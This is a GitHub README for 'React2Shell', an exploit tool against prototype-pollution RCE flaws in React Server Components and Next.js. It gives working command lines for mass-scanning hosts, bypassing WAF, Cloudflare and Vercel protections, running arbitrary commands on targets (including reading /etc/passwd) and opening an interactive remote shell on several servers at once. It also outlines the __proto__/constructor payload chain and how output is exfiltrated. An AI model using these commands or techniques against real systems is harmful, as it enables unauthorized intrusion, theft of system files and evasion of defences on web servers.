R2S - React2Shell Ultimate Scanner & Exploit Tool

⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.

📋 Overview

R2S (React2Shell) is a combined scanner and exploitation tool targeting prototype pollution vulnerabilities in React Server Components and Next.js applications. It supports:

CVE-2025-55182: React Server Components prototype pollution
CVE-2025-66478: Next.js Server Actions prototype pollution leading to RCE

The tool enables security researchers to detect and verify these critical vulnerabilities through multiple detection modes and exploitation techniques.

✨ Features

🔍 Detection Modes

Mode	Description	Risk Level
Safe	Side-channel detection only - no code execution	None
Passive	JavaScript expression evaluation - no system commands	Low
Active	Full RCE verification (executes `41*271=11111` calculation)	Medium

🛡️ WAF Bypass Techniques

Bypass	Description
Standard WAF Bypass	Configurable junk data padding (default: 128KB)
Cloudflare Bypass	1025KB padding + unicode obfuscation + header spoofing
Vercel Bypass	Specialized payload variant for Vercel-hosted applications

💻 Execution Modes

Scan Mode: Bulk vulnerability scanning with multi-threading
Exec Mode: Single command execution with output capture
Shell Mode: Interactive shell for command execution
Self-Test Mode: Verify scanner mechanics and payload structures

📊 Output Formats

JSON (default)
CSV
Plain text (TXT)

🚀 Installation

Requirements

Python 3.9 or higher
requests library
tqdm library (optional, for progress bars)

Quick Install

# Clone the repository
git clone https://github.com/devtint/React2Shell.git
cd React2Shell

# Install dependencies
pip install -r requirements.txt

# Or install directly
pip install requests tqdm

📖 Usage

Basic Syntax

python r2s.py <command> [options]

Commands

Command	Description
`scan`	Scan hosts for vulnerability
`exec`	Execute command on target host(s)
`shell`	Interactive shell mode
`selftest`	Self-test to verify scanner mechanics

🔍 Scan Mode

Single Host Scan

# Passive mode (default) - JavaScript expression evaluation
python r2s.py scan -u https://target.com

# Safe mode - Side-channel detection only (no code execution)
python r2s.py scan -u https://target.com --safe

# Active mode - Full RCE verification
python r2s.py scan -u https://target.com --active

Bulk Scanning

# Scan multiple hosts from file with threading
python r2s.py scan -l hosts.txt -t 50 --timeout 15

# Save results to file
python r2s.py scan -l hosts.txt -o results.json -f json

Custom Paths

# Test specific paths
python r2s.py scan -u https://target.com --path /_next --path /api

# Load paths from file
python r2s.py scan -u https://target.com --path-file paths.txt

WAF Bypass Options

# Standard WAF bypass (128KB junk data)
python r2s.py scan -u https://target.com --waf-bypass

# Custom junk data size
python r2s.py scan -u https://target.com --waf-bypass --waf-bypass-size 256

# Cloudflare bypass (1025KB + obfuscation)
python r2s.py scan -u https://cf-protected.com --cf-bypass

# Vercel bypass
python r2s.py scan -u https://vercel-hosted.com --vercel-bypass

Scan Options Reference

Option	Description
`-u, --url`	Single URL to scan
`-l, --list`	File containing list of hosts
`--safe`	Safe side-channel detection
`--active`	Active RCE verification
`-t, --threads`	Number of concurrent threads (default: 10)
`--timeout`	Request timeout in seconds (default: 10)
`--path`	Custom path to test (repeatable)
`--path-file`	File containing paths to test
`--waf-bypass`	Enable WAF bypass with junk data
`--waf-bypass-size`	Size of junk data in KB (default: 128)
`--cf-bypass`	Cloudflare bypass mode
`--vercel-bypass`	Vercel WAF bypass mode
`--windows`	Use Windows PowerShell payload
`-k, --insecure`	Disable SSL verification
`-H, --header`	Custom header (Key: Value format)

💀 Exec Mode

Execute a single command on one or more targets:

# Execute command on single target
python r2s.py exec https://target.com -c "id"

# Execute on multiple targets
python r2s.py exec https://target1.com https://target2.com -c "whoami"

# Fire-and-forget (no output capture)
python r2s.py exec https://target.com -c "touch /tmp/pwned" --no-output

# With WAF bypass
python r2s.py exec https://target.com -c "cat /etc/passwd" --waf-bypass

Exec Options Reference

Option	Description
`-c, --command`	Command to execute (required)
`--no-output`	Do not attempt to read command output
`--timeout`	Request timeout (default: 10)
`--waf-bypass`	Enable WAF bypass
`--waf-bypass-size`	Junk data size in KB
`-k, --insecure`	Disable SSL verification

🐚 Shell Mode

Interactive shell for continuous command execution:

# Single target
python r2s.py shell https://target.com

# Multiple targets (commands executed on all)
python r2s.py shell https://target1.com https://target2.com

# With options
python r2s.py shell https://target.com --waf-bypass -k

Shell commands:

Type any command to execute
exit, quit, or q to exit
Ctrl+C to interrupt

🧪 Self-Test Mode

Verify scanner mechanics and payload structures:

python r2s.py selftest

# Custom port for test server
python r2s.py selftest --port 8888

Self-test verifies:

Safe payload structure
Passive payload structure
RCE payload structure
WAF bypass payload
Cloudflare bypass payload
Vercel bypass payload
Custom command payload
Live request test

🌐 Global Options

Option	Description
`--no-banner`	Suppress banner display
`--no-color`	Disable colored output
`-v, --verbose`	Verbose output
`-q, --quiet`	Quiet mode (only show vulnerable hosts)
`-o, --output`	Output file for results
`-f, --format`	Output format: json, csv, txt (default: json)

📁 Output Examples

JSON Output

{
  "scan_time": "2025-01-01T12:00:00Z",
  "total_results": 10,
  "vulnerable_count": 2,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "mode": "passive",
      "status_code": 200,
      "final_url": "https://target.com/",
      "output": "1379",
      "timestamp": "2025-01-01T12:00:01Z"
    }
  ]
}

CSV Output

host,vulnerable,mode,status_code,final_url,output,error,timestamp
https://target.com,True,passive,200,https://target.com/,1379,,2025-01-01T12:00:01Z

🔧 Technical Details

Vulnerability Mechanism

The tool exploits prototype pollution in React Server Components and Next.js Server Actions:

Prototype Pollution: Manipulates __proto__ to inject malicious properties
Constructor Chain: Uses constructor:constructor chain to access Function
Code Execution: Injects JavaScript code via _prefix property
Output Exfiltration: Uses NEXT_REDIRECT error to extract command output

Detection Methods

Method	Indicator
Safe	Server returns 500 with `E{"digest"` pattern
Passive	`X-Action-Redirect` header contains evaluated expression
Active	`X-Action-Redirect` header contains `11111` (41*271)

📝 Hosts File Format

# Comments start with #
https://target1.com
https://target2.com
http://target3.com:8080
target4.com

🔒 Security Considerations

Always test only on systems you have authorization to test
The tool modifies payloads to include RCE code - use responsibly
WAF bypass techniques may be detected by advanced security systems
Command output is exfiltrated via HTTP headers (visible in logs)

🤝 Contributing

Contributions are welcome! Please feel free to submit a Pull Request.

📜 License

This project is licensed under the MIT License - see the LICENSE file for details.

🙏 Acknowledgments

Security researchers who discovered CVE-2025-55182 and CVE-2025-66478
The React and Next.js security teams for addressing these vulnerabilities

⚠️ For authorized security testing only ⚠️

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
.gitignore		.gitignore
README.md		README.md
r2s.py		r2s.py
requirements.txt		requirements.txt

devtint/React2Shell

Folders and files

Latest commit

History

Repository files navigation